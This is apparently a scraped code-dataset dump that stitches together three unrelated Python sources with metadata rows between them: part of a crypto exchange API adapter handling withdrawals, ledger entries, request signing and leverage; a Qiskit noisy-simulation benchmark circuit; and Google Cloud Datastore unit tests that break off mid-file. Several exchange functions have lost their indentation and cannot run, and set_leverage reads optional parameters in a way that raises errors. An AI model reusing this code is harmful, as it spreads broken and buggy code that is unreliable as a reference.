        :param str code: unified currency code(optional)
        :param int since: start date in milliseconds(sent as yyyy-mm-dd)
        :param int limit: max number of records(exchange default 20, max 50)
        :param dict params: extra exchange-specific parameters, e.g. 'status'
        :returns list: unified transaction structures tagged type='withdrawal'
        """
        self.load_markets()
        request = {
            # 'coin': currency['id'],
            # 'start_date': self.iso8601(since),
            # 'end_date': self.iso8601(till),
            # 'status': 'Pending', # ToBeConfirmed, UnderReview, Pending, Success, CancelByUser, Reject, Expire
            # 'page': 1,
            # 'limit': 20, # max 50
        }
        currency = None
        if code is not None:
            currency = self.currency(code)
            request['coin'] = currency['id']
        if since is not None:
            # the endpoint accepts dates, not timestamps
            request['start_date'] = self.yyyymmdd(since)
        if limit is not None:
            request['limit'] = limit
        response = self.v2PrivateGetWalletWithdrawList(self.extend(request, params))
        #
        #     {
        #         "ret_code": 0,
        #         "ret_msg": "ok",
        #         "ext_code": "",
        #         "result": {
        #             "data": [
        #                 {
        #                     "id": 137,
        #                     "user_id": 1,
        #                     "coin": "XRP", # Coin Enum
        #                     "status": "Pending", # Withdraw Status Enum
        #                     "amount": "20.00000000",
        #                     "fee": "0.25000000",
        #                     "address": "rH7H595XYEVTEHU2FySYsWnmfACBnZS9zM",
        #                     "tx_id": "",
        #                     "submited_at": "2019-06-11T02:20:24.000Z",
        #                     "updated_at": "2019-06-11T02:20:24.000Z"
        #                 },
        #             ],
        #             "current_page": 1,
        #             "last_page": 1
        #         },
        #         "ext_info": null,
        #         "time_now": "1577482295.125488",
        #         "rate_limit_status": 119,
        #         "rate_limit_reset_ms": 1577482295132,
        #         "rate_limit": 120
        #     }
        #
        result = self.safe_value(response, 'result', {})
        data = self.safe_value(result, 'data', [])
        return self.parse_transactions(data, currency, since, limit, {'type': 'withdrawal'})
def parse_transaction_status(self, status):
statuses = {
'ToBeConfirmed': 'pending',
'UnderReview': 'pending',
'Pending': 'pending',
'Success': 'ok',
'CancelByUser': 'canceled',
'Reject': 'rejected',
'Expire': 'expired',
}
return self.safe_string(statuses, status, status)
    def parse_transaction(self, transaction, currency=None):
        """Convert a raw withdrawal record or wallet-fund-record into a unified
        ccxt transaction structure.

        :param dict transaction: a raw record(see examples below)
        :param dict currency: optional unified currency used to resolve the code
        :returns dict: a unified transaction structure
        """
        #
        # fetchWithdrawals
        #
        #     {
        #         "id": 137,
        #         "user_id": 1,
        #         "coin": "XRP", # Coin Enum
        #         "status": "Pending", # Withdraw Status Enum
        #         "amount": "20.00000000",
        #         "fee": "0.25000000",
        #         "address": "rH7H595XYEVTEHU2FySYsWnmfACBnZS9zM",
        #         "tx_id": "",
        #         "submited_at": "2019-06-11T02:20:24.000Z",
        #         "updated_at": "2019-06-11T02:20:24.000Z"
        #     }
        #
        # fetchDeposits ledger entries
        #
        #     {
        #         "id": 234467,
        #         "user_id": 1,
        #         "coin": "BTC",
        #         "wallet_id": 27913,
        #         "type": "Realized P&L",
        #         "amount": "-0.00000006",
        #         "tx_id": "",
        #         "address": "BTCUSD",
        #         "wallet_balance": "0.03000330",
        #         "exec_time": "2019-12-09T00:00:25.000Z",
        #         "cross_seq": 0
        #     }
        #
        currencyId = self.safe_string(transaction, 'coin')
        code = self.safe_currency_code(currencyId, currency)
        # withdrawals carry 'submited_at'(sic), fund records carry 'exec_time'
        timestamp = self.parse8601(self.safe_string_2(transaction, 'submited_at', 'exec_time'))
        updated = self.parse8601(self.safe_string(transaction, 'updated_at'))
        status = self.parse_transaction_status(self.safe_string(transaction, 'status'))
        address = self.safe_string(transaction, 'address')
        feeCost = self.safe_number(transaction, 'fee')
        type = self.safe_string_lower(transaction, 'type')
        fee = None
        if feeCost is not None:
            fee = {
                'cost': feeCost,
                'currency': code,
            }
        return {
            'info': transaction,
            'id': self.safe_string(transaction, 'id'),
            'txid': self.safe_string(transaction, 'tx_id'),
            'timestamp': timestamp,
            'datetime': self.iso8601(timestamp),
            'address': address,
            'addressTo': None,
            'addressFrom': None,
            'tag': None,
            'tagTo': None,
            'tagFrom': None,
            'type': type,
            'amount': self.safe_number(transaction, 'amount'),
            'currency': code,
            'status': status,
            'updated': updated,
            'fee': fee,
        }
    def fetch_ledger(self, code=None, since=None, limit=None, params={}):
        """Fetch the account's wallet fund records(deposits, withdrawals,
        realized PNL, commissions, refunds, ...) as unified ledger entries.

        :param str code: unified currency code(optional)
        :param int since: start date in milliseconds(sent as yyyy-mm-dd)
        :param int limit: max number of records(exchange default 20, max 50)
        :param dict params: extra parameters, e.g. 'wallet_fund_type' to filter
        :returns list: unified ledger entry structures
        """
        self.load_markets()
        request = {
            # 'coin': currency['id'],
            # 'currency': currency['id'], # alias
            # 'start_date': self.iso8601(since),
            # 'end_date': self.iso8601(till),
            # 'wallet_fund_type': 'Deposit', # Withdraw, RealisedPNL, Commission, Refund, Prize, ExchangeOrderWithdraw, ExchangeOrderDeposit
            # 'page': 1,
            # 'limit': 20, # max 50
        }
        currency = None
        if code is not None:
            currency = self.currency(code)
            request['coin'] = currency['id']
        if since is not None:
            # the endpoint accepts dates, not timestamps
            request['start_date'] = self.yyyymmdd(since)
        if limit is not None:
            request['limit'] = limit
        response = self.v2PrivateGetWalletFundRecords(self.extend(request, params))
        #
        #     {
        #         "ret_code": 0,
        #         "ret_msg": "ok",
        #         "ext_code": "",
        #         "result": {
        #             "data": [
        #                 {
        #                     "id": 234467,
        #                     "user_id": 1,
        #                     "coin": "BTC",
        #                     "wallet_id": 27913,
        #                     "type": "Realized P&L",
        #                     "amount": "-0.00000006",
        #                     "tx_id": "",
        #                     "address": "BTCUSD",
        #                     "wallet_balance": "0.03000330",
        #                     "exec_time": "2019-12-09T00:00:25.000Z",
        #                     "cross_seq": 0
        #                 }
        #             ]
        #         },
        #         "ext_info": null,
        #         "time_now": "1577481867.115552",
        #         "rate_limit_status": 119,
        #         "rate_limit_reset_ms": 1577481867122,
        #         "rate_limit": 120
        #     }
        #
        result = self.safe_value(response, 'result', {})
        data = self.safe_value(result, 'data', [])
        return self.parse_ledger(data, currency, since, limit)
    def parse_ledger_entry(self, item, currency=None):
        """Convert a raw wallet-fund-record into a unified ledger entry.

        The pre-transaction balance('before') is reconstructed from the
        post-transaction balance('after') and the signed amount.

        :param dict item: a raw fund record(see example below)
        :param dict currency: optional unified currency used to resolve the code
        :returns dict: a unified ledger entry structure
        """
        #
        #     {
        #         "id": 234467,
        #         "user_id": 1,
        #         "coin": "BTC",
        #         "wallet_id": 27913,
        #         "type": "Realized P&L",
        #         "amount": "-0.00000006",
        #         "tx_id": "",
        #         "address": "BTCUSD",
        #         "wallet_balance": "0.03000330",
        #         "exec_time": "2019-12-09T00:00:25.000Z",
        #         "cross_seq": 0
        #     }
        #
        currencyId = self.safe_string(item, 'coin')
        code = self.safe_currency_code(currencyId, currency)
        amount = self.safe_number(item, 'amount')
        after = self.safe_number(item, 'wallet_balance')
        # NOTE(review): assumes 'amount' is always present - a missing amount
        # would make this comparison raise TypeError; confirm with the API docs
        direction = 'out' if (amount < 0) else 'in'
        before = None
        if after is not None and amount is not None:
            # undo the signed movement to recover the prior balance
            difference = amount if (direction == 'out') else -amount
            before = self.sum(after, difference)
        timestamp = self.parse8601(self.safe_string(item, 'exec_time'))
        type = self.parse_ledger_entry_type(self.safe_string(item, 'type'))
        id = self.safe_string(item, 'id')
        referenceId = self.safe_string(item, 'tx_id')
        return {
            'id': id,
            'currency': code,
            'account': self.safe_string(item, 'wallet_id'),
            'referenceAccount': None,
            'referenceId': referenceId,
            'status': None,
            'amount': amount,
            'before': before,
            'after': after,
            'fee': None,
            'direction': direction,
            'timestamp': timestamp,
            'datetime': self.iso8601(timestamp),
            'type': type,
            'info': item,
        }
def parse_ledger_entry_type(self, type):
types = {
'Deposit': 'transaction',
'Withdraw': 'transaction',
'RealisedPNL': 'trade',
'Commission': 'fee',
'Refund': 'cashback',
'Prize': 'prize', # ?
'ExchangeOrderWithdraw': 'transaction',
'ExchangeOrderDeposit': 'transaction',
}
return self.safe_string(types, type, type)
    def fetch_positions(self, symbols=None, params={}):
        """Fetch open positions.

        :param list symbols: either None(all positions of the selected type)
            or a list containing exactly one unified symbol
        :param dict params: 'type' may be 'linear', 'inverse' or 'inverseFuture'
            and overrides options['defaultType']
        :raises ArgumentsRequired: when symbols is a list of length != 1
        :returns: the raw 'result' field of the response(list or dict)
        """
        self.load_markets()
        request = {}
        if isinstance(symbols, list):
            length = len(symbols)
            if length != 1:
                raise ArgumentsRequired(self.id + ' fetchPositions takes an array with exactly one symbol')
            request['symbol'] = self.market_id(symbols[0])
        defaultType = self.safe_string(self.options, 'defaultType', 'linear')
        type = self.safe_string(params, 'type', defaultType)
        params = self.omit(params, 'type')
        response = None
        if type == 'linear':
            response = self.privateLinearGetPositionList(self.extend(request, params))
        elif type == 'inverse':
            response = self.v2PrivateGetPositionList(self.extend(request, params))
        elif type == 'inverseFuture':
            response = self.futuresPrivateGetPositionList(self.extend(request, params))
        # some transports hand back the raw JSON string - decode it here
        # NOTE(review): basestring is presumably provided by the ccxt py2/py3
        # compatibility layer imported at the top of the file - confirm
        if (isinstance(response, basestring)) and self.is_json_encoded_object(response):
            response = json.loads(response)
        #
        #     {
        #         ret_code: 0,
        #         ret_msg: 'OK',
        #         ext_code: '',
        #         ext_info: '',
        #         result: [] or {} depending on the request
        #     }
        #
        return self.safe_value(response, 'result')
    def sign(self, path, api='public', method='GET', params={}, headers=None, body=None):
        """Build a signed(or public) HTTP request for the exchange.

        :param str path: the endpoint path
        :param api: a[type, section] pair, e.g. ['spot', 'private'] -
            NOTE(review): despite the 'public' default, the code reads it with
            safe_string(api, 0/1), i.e. as a sequence - confirm against callers
        :param str method: HTTP verb
        :param dict params: request parameters, encoded into the query string
            or the JSON body
        :returns dict: {'url', 'method', 'body', 'headers'}
        """
        type = self.safe_string(api, 0)
        section = self.safe_string(api, 1)
        if type == 'spot':
            # spot endpoints are versioned: /spot/v1/... or /spot/<section>/v1/...
            if section == 'public':
                section = 'v1'
            else:
                section += '/v1'
        url = self.implode_hostname(self.urls['api'][type])
        request = '/' + type + '/' + section + '/' + path
        if (type == 'spot') or (type == 'quote'):
            if params:
                request += '?' + self.rawencode(params)
        elif section == 'public':
            if params:
                request += '?' + self.rawencode(params)
        elif type == 'public':
            if params:
                request += '?' + self.rawencode(params)
        else:
            # private endpoints: sign the key-sorted query string with HMAC
            self.check_required_credentials()
            timestamp = self.nonce()
            query = self.extend(params, {
                'api_key': self.apiKey,
                'recv_window': self.options['recvWindow'],
                'timestamp': timestamp,
            })
            sortedQuery = self.keysort(query)
            auth = self.rawencode(sortedQuery)
            signature = self.hmac(self.encode(auth), self.encode(self.secret))
            if method == 'POST':
                # POST requests carry the signature inside the JSON body
                body = self.json(self.extend(query, {
                    'sign': signature,
                }))
                headers = {
                    'Content-Type': 'application/json',
                }
            else:
                # GET requests carry the signature as the last query parameter
                request += '?' + self.urlencode(sortedQuery) + '&sign=' + signature
        url += request
        return {'url': url, 'method': method, 'body': body, 'headers': headers}
def handle_errors(self, httpCode, reason, url, method, headers, body, response, requestHeaders, requestBody):
if not response:
return # fallback to default error handler
#
# {
# ret_code: 10001,
# ret_msg: 'ReadMapCB: expect {or n, but found \u0000, error ' +
# 'found in #0 byte of ...||..., bigger context ' +
# '...||...',
# ext_code: '',
# ext_info: '',
# result: null,
# time_now: '1583934106.590436'
# }
#
errorCode = self.safe_string(response, 'ret_code')
if errorCode != '0':
feedback = self.id + ' ' + body
self.throw_exactly_matched_exception(self.exceptions['exact'], errorCode, feedback)
self.throw_broadly_matched_exception(self.exceptions['broad'], body, feedback)
raise ExchangeError(feedback) # unknown message
    def set_margin_mode(self, marginType, symbol=None, params={}):
        """Switch a market between isolated and cross margin, setting leverage
        for both sides at the same time.

        :param str marginType: 'isolated' or 'crossed'(case-insensitive)
        :param str symbol: unified market symbol -
            NOTE(review): defaults to None but self.market(None) will fail,
            so a symbol is effectively required; confirm with callers
        :param dict params: must include 'leverage'
        :raises ArgumentsRequired: when params['leverage'] is missing
        :raises BadRequest: when marginType is not isolated/crossed
        :returns: the raw exchange response
        """
        #
        #     {
        #         "ret_code": 0,
        #         "ret_msg": "ok",
        #         "ext_code": "",
        #         "result": null,
        #         "ext_info": null,
        #         "time_now": "1577477968.175013",
        #         "rate_limit_status": 74,
        #         "rate_limit_reset_ms": 1577477968183,
        #         "rate_limit": 75
        #     }
        #
        leverage = self.safe_value(params, 'leverage')
        if leverage is None:
            raise ArgumentsRequired(self.id + '.setMarginMode requires a leverage parameter')
        marginType = marginType.upper()
        if (marginType != 'ISOLATED') and (marginType != 'CROSSED'):
            raise BadRequest(self.id + ' marginType must be either isolated or crossed')
        self.load_markets()
        market = self.market(symbol)
        method = None
        defaultType = self.safe_string(self.options, 'defaultType', 'linear')
        marketTypes = self.safe_value(self.options, 'marketTypes', {})
        marketType = self.safe_string(marketTypes, symbol, defaultType)
        # pick the endpoint from the market flavor(or the configured default)
        linear = market['linear'] or (marketType == 'linear')
        inverse = (market['swap'] and market['inverse']) or (marketType == 'inverse')
        futures = market['futures'] or (marketType == 'futures')
        if linear:
            method = 'privateLinearPostPositionSwitchIsolated'
        elif inverse:
            method = 'v2PrivatePostPositionSwitchIsolated'
        elif futures:
            method = 'privateFuturesPostPositionSwitchIsolated'
        isIsolated = (marginType == 'ISOLATED')
        request = {
            'symbol': market['id'],
            'is_isolated': isIsolated,
            'buy_leverage': leverage,
            'sell_leverage': leverage,
        }
        return getattr(self, method)(self.extend(request, params))
def set_leverage(self, leverage, symbol=None, params={}):
if symbol is None:
raise ArgumentsRequired(self.id + ' setLeverage() requires a symbol argument')
self.load_markets()
market = self.market(symbol)
# WARNING: THIS WILL INCREASE LIQUIDATION PRICE FOR OPEN ISOLATED LONG POSITIONS
# AND DECREASE LIQUIDATION PRICE FOR OPEN ISOLATED SHORT POSITIONS
defaultType = self.safe_string(self.options, 'defaultType', 'linear')
marketTypes = self.safe_value(self.options, 'marketTypes', {})
marketType = self.safe_string(marketTypes, symbol, defaultType)
linear = market['linear'] or (marketType == 'linear')
inverse = (market['swap'] and market['inverse']) or (marketType == 'inverse')
futures = market['futures'] or (marketType == 'futures')
method = None
if linear:
method = 'privateLinearPostPositionSetLeverage'
elif inverse:
method = 'v2PrivatePostPositionLeverageSave'
elif futures:
method = 'privateFuturesPostPositionLeverageSave'
buy_leverage = leverage
sell_leverage = leverage
if params['buy_leverage'] and params['sell_leverage'] and linear:
buy_leverage = params['buy_leverage']
sell_leverage = params['sell_leverage']
elif not leverage:
if linear:
raise ArgumentsRequired(self.id + ' setLeverage() requires either the parameter leverage or params["buy_leverage"] and params["sell_leverage"] for linear contracts')
else:
raise ArgumentsRequired(self.id + ' setLeverage() requires parameter leverage for inverse and futures contracts')
if (buy_leverage < 1) or (buy_leverage > 100) or (sell_leverage < 1) or (sell_leverage > 100):
raise BadRequest(self.id + ' leverage should be between 1 and 100')
request = {
'symbol': market['id'],
'leverage_only': True,
}
if not linear:
request['leverage'] = buy_leverage
else:
request['buy_leverage'] = buy_leverage
request['sell_leverage'] = sell_leverage
return getattr(self, method)(self.extend(request, params))
| [
"travis@travis-ci.org"
] | travis@travis-ci.org |
abac750ec39d365e349d684cf03414f5725f8da0 | 09e57dd1374713f06b70d7b37a580130d9bbab0d | /benchmark/startQiskit_noisy2506.py | a7fde2d65a26c997e4016788e19ab6906db2feb1 | [
"BSD-3-Clause"
] | permissive | UCLA-SEAL/QDiff | ad53650034897abb5941e74539e3aee8edb600ab | d968cbc47fe926b7f88b4adf10490f1edd6f8819 | refs/heads/main | 2023-08-05T04:52:24.961998 | 2021-09-19T02:56:16 | 2021-09-19T02:56:16 | 405,159,939 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,134 | py | # qubit number=4
# total number=37
import cirq
import qiskit
from qiskit.providers.aer import QasmSimulator
from qiskit.test.mock import FakeVigo
from qiskit import QuantumCircuit, QuantumRegister, ClassicalRegister
from qiskit import BasicAer, execute, transpile
from pprint import pprint
from qiskit.test.mock import FakeVigo
from math import log2
import numpy as np
import networkx as nx
def bitwise_xor(s: str, t: str) -> str:
    """XOR two equal-length bit strings character-wise.

    The resulting bit sequence is reversed before joining, matching the
    little-endian bit ordering used elsewhere in this benchmark.
    """
    bits = [str(int(s[i]) ^ int(t[i])) for i in range(len(s))]
    bits.reverse()
    return ''.join(bits)
def bitwise_dot(s: str, t: str) -> str:
    """Return the inner(dot) product of two bit strings modulo 2, as '0' or '1'."""
    total = sum(int(s[i]) * int(t[i]) for i in range(len(s)))
    return str(total % 2)
def build_oracle(n: int, f) -> QuantumCircuit:
    """Build the phase/bit-flip oracle O_f on n control qubits plus 1 target.

    For every n-bit string rep with f(rep) == "1", the target qubit is flipped
    by a multi-controlled Toffoli; X gates are placed around the controls that
    correspond to 0-bits of rep so the Toffoli fires exactly on that input.

    :param n: number of input(control) qubits
    :param f: a function from an n-character bit string to "0" or "1"
    :returns: a QuantumCircuit named "Of" over registers "ofc"(n) and "oft"(1)
    """
    # implement the oracle O_f
    # NOTE: use multi_control_toffoli_gate ('noancilla' mode)
    # https://qiskit.org/documentation/_modules/qiskit/aqua/circuits/gates/multi_control_toffoli_gate.html
    # https://quantumcomputing.stackexchange.com/questions/3943/how-do-you-implement-the-toffoli-gate-using-only-single-qubit-and-cnot-gates
    # https://quantumcomputing.stackexchange.com/questions/2177/how-can-i-implement-an-n-bit-toffoli-gate
    controls = QuantumRegister(n, "ofc")
    target = QuantumRegister(1, "oft")
    oracle = QuantumCircuit(controls, target, name="Of")
    for i in range(2 ** n):
        rep = np.binary_repr(i, n)
        if f(rep) == "1":
            # flip 0-bit controls so the MCT matches this specific input
            for j in range(n):
                if rep[j] == "0":
                    oracle.x(controls[j])
            oracle.mct(controls, target[0], None, mode='noancilla')
            # undo the X gates to restore the controls
            for j in range(n):
                if rep[j] == "0":
                    oracle.x(controls[j])
    # oracle.barrier()
    return oracle
def make_circuit(n:int,f) -> QuantumCircuit:
    """Build the benchmark circuit: a generated gate sequence, the oracle for f
    on the first n-1 qubits, more generated gates, then measure every qubit.

    The "# number=NN" comments are ids from the generator that produced this
    gate sequence(the sequence itself is auto-generated mutation output, not a
    hand-written algorithm).

    :param n: total number of qubits(and classical bits)
    :param f: the boolean function passed to build_oracle(on n-1 inputs)
    :returns: the measured QuantumCircuit
    """
    # circuit begin
    input_qubit = QuantumRegister(n,"qc")
    classical = ClassicalRegister(n, "qm")
    prog = QuantumCircuit(input_qubit, classical)
    prog.h(input_qubit[3]) # number=19
    prog.cz(input_qubit[0],input_qubit[3]) # number=20
    prog.h(input_qubit[3]) # number=21
    prog.cx(input_qubit[0],input_qubit[3]) # number=23
    prog.x(input_qubit[3]) # number=24
    prog.cx(input_qubit[0],input_qubit[3]) # number=25
    prog.cx(input_qubit[0],input_qubit[3]) # number=17
    prog.rx(-0.48380526865282825,input_qubit[3]) # number=26
    prog.h(input_qubit[1])  # number=2
    prog.y(input_qubit[3]) # number=18
    prog.h(input_qubit[2])  # number=3
    prog.h(input_qubit[3])  # number=4
    prog.y(input_qubit[3])  # number=12
    prog.h(input_qubit[0])  # number=5
    # apply the oracle to qubits 0..n-2 with qubit n-1 as the target
    oracle = build_oracle(n-1, f)
    prog.append(oracle.to_gate(),[input_qubit[i] for i in range(n-1)]+[input_qubit[n-1]])
    prog.h(input_qubit[1])  # number=6
    prog.h(input_qubit[2])  # number=7
    prog.cx(input_qubit[0],input_qubit[1]) # number=28
    prog.h(input_qubit[1]) # number=34
    prog.cz(input_qubit[0],input_qubit[1]) # number=35
    prog.h(input_qubit[1]) # number=36
    prog.x(input_qubit[1]) # number=32
    prog.cx(input_qubit[0],input_qubit[1]) # number=33
    prog.cx(input_qubit[0],input_qubit[1]) # number=30
    prog.h(input_qubit[3])  # number=8
    prog.h(input_qubit[0])  # number=9
    prog.y(input_qubit[2]) # number=10
    prog.x(input_qubit[2]) # number=22
    prog.y(input_qubit[2]) # number=11
    prog.x(input_qubit[0]) # number=13
    prog.x(input_qubit[0]) # number=14
    # circuit end
    for i in range(n):
        prog.measure(input_qubit[i], classical[i])
    return prog
if __name__ == '__main__':
    # f(x) = (a . x) xor b - a Bernstein-Vazirani-style hidden-string function
    a = "111"
    b = "0"
    f = lambda rep: bitwise_xor(bitwise_dot(a, rep), b)
    prog = make_circuit(4,f)
    # FakeVigo is a noisy simulator backend snapshot of the real device
    backend = FakeVigo()
    sample_shot =8000
    info = execute(prog, backend=backend, shots=sample_shot).result().get_counts()
    backend = FakeVigo()
    circuit1 = transpile(prog,backend,optimization_level=2)
    # write counts, a sentinel line, the transpiled depth, and the circuit diagram
    writefile = open("../data/startQiskit_noisy2506.csv","w")
    print(info,file=writefile)
    print("results end", file=writefile)
    print(circuit1.__len__(),file=writefile)
    print(circuit1,file=writefile)
    writefile.close()
| [
"wangjiyuan123@yeah.net"
] | wangjiyuan123@yeah.net |
5f2b28c666e9d573c062026014cbd9a27b6abbc2 | 0ac38e9eaa2fb90cf55bbd4ab94055e6a4416b3e | /lib/unit_tests/datastore/test_connection.py | 244975f063f02ad1eeae6c5b767539976ceba906 | [
"Apache-2.0"
] | permissive | varnachandar/emotion2music | 6f5a42c8dd5542ad3ea919e366f906666cb4c299 | aa58c80d5ea81cfba7760b8f9b3151db9c61b6bc | refs/heads/master | 2020-04-27T15:12:44.795220 | 2019-03-07T23:59:11 | 2019-03-07T23:59:11 | 174,437,101 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 41,443 | py | # Copyright 2014 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from google.cloud.datastore.connection import _HAVE_GRPC
class Test_DatastoreAPIOverHttp(unittest.TestCase):
    """Tests for the HTTP fallback transport of the datastore connection."""
    def _getTargetClass(self):
        # Imported lazily so merely collecting the tests cannot fail.
        from google.cloud.datastore.connection import _DatastoreAPIOverHttp
        return _DatastoreAPIOverHttp
    def _makeOne(self, *args, **kw):
        return self._getTargetClass()(*args, **kw)
    def test__rpc(self):
        # Request/response protobuf doubles.  NOTE: REQPB is bound later in
        # this scope and is only resolved when SerializeToString() runs.
        class ReqPB(object):
            def SerializeToString(self):
                return REQPB
        class RspPB(object):
            def __init__(self, pb):
                self._pb = pb
            @classmethod
            def FromString(cls, pb):
                return cls(pb)
        REQPB = b'REQPB'
        PROJECT = 'PROJECT'
        METHOD = 'METHOD'
        URI = 'http://api-url'
        conn = _Connection(URI)
        datastore_api = self._makeOne(conn)
        http = conn.http = Http({'status': '200'}, 'CONTENT')
        response = datastore_api._rpc(PROJECT, METHOD, ReqPB(), RspPB)
        # The raw payload must have been routed through RspPB.FromString.
        self.assertTrue(isinstance(response, RspPB))
        self.assertEqual(response._pb, 'CONTENT')
        called_with = http._called_with
        self.assertEqual(called_with['uri'], URI)
        self.assertEqual(called_with['method'], 'POST')
        self.assertEqual(called_with['headers']['Content-Type'],
                         'application/x-protobuf')
        self.assertEqual(called_with['headers']['User-Agent'],
                         conn.USER_AGENT)
        self.assertEqual(called_with['body'], REQPB)
        self.assertEqual(conn.build_kwargs,
                         [{'method': METHOD, 'project': PROJECT}])
    def test__request_w_200(self):
        PROJECT = 'PROJECT'
        METHOD = 'METHOD'
        DATA = b'DATA'
        URI = 'http://api-url'
        conn = _Connection(URI)
        datastore_api = self._makeOne(conn)
        http = conn.http = Http({'status': '200'}, 'CONTENT')
        # A 200 response hands the body back untouched.
        self.assertEqual(datastore_api._request(PROJECT, METHOD, DATA),
                         'CONTENT')
        called_with = http._called_with
        self.assertEqual(called_with['uri'], URI)
        self.assertEqual(called_with['method'], 'POST')
        self.assertEqual(called_with['headers']['Content-Type'],
                         'application/x-protobuf')
        self.assertEqual(called_with['headers']['User-Agent'],
                         conn.USER_AGENT)
        self.assertEqual(called_with['body'], DATA)
        self.assertEqual(conn.build_kwargs,
                         [{'method': METHOD, 'project': PROJECT}])
    def test__request_not_200(self):
        from google.cloud.exceptions import BadRequest
        from google.rpc import status_pb2
        # A non-200 body is a serialized google.rpc.Status protobuf; the
        # transport must surface it as the matching HTTP exception type.
        error = status_pb2.Status()
        error.message = 'Entity value is indexed.'
        error.code = 9  # FAILED_PRECONDITION
        PROJECT = 'PROJECT'
        METHOD = 'METHOD'
        DATA = 'DATA'
        URI = 'http://api-url'
        conn = _Connection(URI)
        datastore_api = self._makeOne(conn)
        conn.http = Http({'status': '400'}, error.SerializeToString())
        with self.assertRaises(BadRequest) as exc:
            datastore_api._request(PROJECT, METHOD, DATA)
        expected_message = '400 Entity value is indexed.'
        self.assertEqual(str(exc.exception), expected_message)
        self.assertEqual(conn.build_kwargs,
                         [{'method': METHOD, 'project': PROJECT}])
class Test_DatastoreAPIOverGRPC(unittest.TestCase):
    """Tests for the gRPC transport wrapper around the generated stub."""
    def _getTargetClass(self):
        from google.cloud.datastore.connection import _DatastoreAPIOverGRPC
        return _DatastoreAPIOverGRPC
    def _makeOne(self, stub, connection=None, secure=True, mock_args=None):
        # Patch make_secure_stub / make_insecure_stub so construction uses
        # the supplied fake `stub`; the factory args are captured in
        # `mock_args` for the constructor tests to inspect.
        from unit_tests._testing import _Monkey
        from google.cloud.datastore import connection as MUT
        if connection is None:
            connection = _Connection(None)
            connection.credentials = object()
            connection.host = 'CURR_HOST'
        if mock_args is None:
            mock_args = []
        def mock_make_stub(*args):
            mock_args.append(args)
            return stub
        if secure:
            to_monkey = {'make_secure_stub': mock_make_stub}
        else:
            to_monkey = {'make_insecure_stub': mock_make_stub}
        with _Monkey(MUT, **to_monkey):
            return self._getTargetClass()(connection, secure)
    def test_constructor(self):
        from google.cloud.datastore import connection as MUT
        conn = _Connection(None)
        conn.credentials = object()
        conn.host = 'CURR_HOST'
        stub = _GRPCStub()
        mock_args = []
        datastore_api = self._makeOne(stub, connection=conn,
                                      mock_args=mock_args)
        self.assertIs(datastore_api._stub, stub)
        # Secure stubs are built with credentials + user agent.
        self.assertEqual(mock_args, [(
            conn.credentials,
            conn.USER_AGENT,
            MUT.datastore_grpc_pb2.DatastoreStub,
            conn.host,
        )])
    def test_constructor_insecure(self):
        from google.cloud.datastore import connection as MUT
        conn = _Connection(None)
        conn.credentials = object()
        conn.host = 'CURR_HOST:1234'
        stub = _GRPCStub()
        mock_args = []
        datastore_api = self._makeOne(stub, connection=conn,
                                      secure=False,
                                      mock_args=mock_args)
        self.assertIs(datastore_api._stub, stub)
        # Insecure stubs are built without credentials.
        self.assertEqual(mock_args, [(
            MUT.datastore_grpc_pb2.DatastoreStub,
            conn.host,
        )])
    def test_lookup(self):
        return_val = object()
        stub = _GRPCStub(return_val)
        datastore_api = self._makeOne(stub=stub)
        request_pb = _RequestPB()
        project = 'PROJECT'
        result = datastore_api.lookup(project, request_pb)
        self.assertIs(result, return_val)
        # The wrapper must stamp the project onto the request protobuf.
        self.assertEqual(request_pb.project_id, project)
        self.assertEqual(stub.method_calls,
                         [(request_pb, 'Lookup')])
    def test_run_query(self):
        return_val = object()
        stub = _GRPCStub(return_val)
        datastore_api = self._makeOne(stub=stub)
        request_pb = _RequestPB()
        project = 'PROJECT'
        result = datastore_api.run_query(project, request_pb)
        self.assertIs(result, return_val)
        self.assertEqual(request_pb.project_id, project)
        self.assertEqual(stub.method_calls,
                         [(request_pb, 'RunQuery')])
    def test_begin_transaction(self):
        return_val = object()
        stub = _GRPCStub(return_val)
        datastore_api = self._makeOne(stub=stub)
        request_pb = _RequestPB()
        project = 'PROJECT'
        result = datastore_api.begin_transaction(project, request_pb)
        self.assertIs(result, return_val)
        self.assertEqual(request_pb.project_id, project)
        self.assertEqual(
            stub.method_calls,
            [(request_pb, 'BeginTransaction')])
    def test_commit_success(self):
        return_val = object()
        stub = _GRPCStub(return_val)
        datastore_api = self._makeOne(stub=stub)
        request_pb = _RequestPB()
        project = 'PROJECT'
        result = datastore_api.commit(project, request_pb)
        self.assertIs(result, return_val)
        self.assertEqual(request_pb.project_id, project)
        self.assertEqual(stub.method_calls,
                         [(request_pb, 'Commit')])
    def _commit_failure_helper(self, exc, err_class):
        # Make the stub raise `exc` from Commit and assert the API layer
        # re-raises it (possibly translated) as `err_class`.
        stub = _GRPCStub(side_effect=exc)
        datastore_api = self._makeOne(stub=stub)
        request_pb = _RequestPB()
        project = 'PROJECT'
        with self.assertRaises(err_class):
            datastore_api.commit(project, request_pb)
        self.assertEqual(request_pb.project_id, project)
        self.assertEqual(stub.method_calls,
                         [(request_pb, 'Commit')])
    @unittest.skipUnless(_HAVE_GRPC, 'No gRPC')
    def test_commit_failure_aborted(self):
        from grpc import StatusCode
        from grpc._channel import _RPCState
        from google.cloud.exceptions import Conflict
        from google.cloud.exceptions import GrpcRendezvous
        # An ABORTED rendezvous is translated into Conflict.
        details = 'Bad things.'
        exc_state = _RPCState((), None, None, StatusCode.ABORTED, details)
        exc = GrpcRendezvous(exc_state, None, None, None)
        self._commit_failure_helper(exc, Conflict)
    @unittest.skipUnless(_HAVE_GRPC, 'No gRPC')
    def test_commit_failure_cancelled(self):
        from grpc import StatusCode
        from grpc._channel import _RPCState
        from google.cloud.exceptions import GrpcRendezvous
        # Non-ABORTED rendezvous errors propagate unchanged.
        exc_state = _RPCState((), None, None, StatusCode.CANCELLED, None)
        exc = GrpcRendezvous(exc_state, None, None, None)
        self._commit_failure_helper(exc, GrpcRendezvous)
    @unittest.skipUnless(_HAVE_GRPC, 'No gRPC')
